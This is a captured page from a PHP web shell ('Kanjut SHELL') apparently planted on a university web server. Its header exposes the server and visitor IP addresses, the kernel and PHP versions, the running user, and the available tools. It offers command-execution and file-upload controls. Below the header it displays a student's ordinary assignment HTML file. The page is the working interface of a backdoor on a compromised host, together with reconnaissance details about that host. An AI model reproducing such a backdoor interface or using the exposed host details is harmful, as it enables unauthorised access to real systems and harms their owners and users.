Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.129.195.254
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/tmhoward/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/tmhoward/www/Asg4_index.html
<!--
	<HTML>
	<HEAD>

	<TITLE>Tyson's homepage</TITLE>
	<BODY style = "background: url(https://images.alphacoders.com/786/thumb-1920-786600.jpg) ; background-size: 100% 100%;">

	<center>

	<font color=blue size=5>
	<body style="text-align: center">
	Assignment 4
	</BODY>
		
	</body>
	</HEAD> 
<p>
	
<A style = "color: green;" HREF=evaluationform.php> Evaluation Form </A> 
<p>
<A style = "color: green;" HREF=finaltable.php> Table </A> 
<p>
	</CENTER>
	</HTML>-->






<!DOCTYPE html>
<html>

<head>


<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
}

.navbar {
  overflow: hidden;
  background-color: #333;
}

.navbar a {
  float: left;
  font-size: 16px;
  color: white;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
}

.dropdown {
  float: left;
  overflow: hidden;
}

.dropdown .dropbtn {
  font-size: 16px;  
  border: none;
  outline: none;
  color: white;
  padding: 14px 16px;
  background-color: inherit;
  font-family: inherit;
  margin: 0;
}

.navbar a:hover, .dropdown:hover .dropbtn {
  background-color: red;
}

.dropdown-content {
  display: none;
  position: absolute;
  background-color: #f9f9f9;
  min-width: 160px;
  box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
  z-index: 1;
}

.dropdown-content a {
  float: none;
  color: black;
  padding: 12px 16px;
  text-decoration: none;
  display: block;
  text-align: left;
}

.dropdown-content a:hover {
  background-color: #ddd;
}

.dropdown:hover .dropdown-content {
  display: block;
}
</style>
</head>

<body>

<div class="navbar">


  <a href=index.html>Go Back</a>

  <div class="dropdown">
    <button class="dropbtn">Assignment 4 
      <i class="fa fa-caret-down"></i>
    </button>
    <div class="dropdown-content">

	<A HREF=evaluationform.php> Evaluation Form </A>
	<A HREF=finaltable.php>Table</a>

    </div>
  </div>

</div>


<head>
<meta name="viewport" content="width=device-width, initial-scale=1">



<!--<style>
body {
  margin: 0;
}
.hero-image {
  background-image: url("https://wallpapercave.com/wp/wp2550277.jpg");
  background-color: #cccccc;
  height: 700px;
  background-position: center;
  background-repeat: repeat;
  background-size: cover;
  position: relative;
}

</style>
-->

<style>
	* { margin: 0; padding: 0; }
		
	html { 
		background: url(https://wallpapercave.com/wp/wp2550277.jpg) no-repeat center center fixed; 
		-webkit-background-size: cover;
		-moz-background-size: cover;
		-o-background-size: cover;
		background-size: cover;
		}
		
	#page-wrap { width: 400px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; }
	p { font: 15px/2 Georgia, Serif; margin: 0 0 30px 0; text-indent: 40px; }
</style>



</head>
<body>
<div class="hero-image">
  <div class="hero-text">
  </div>
</div>
</body>
</body>





</html>




Stv3n404 - 2023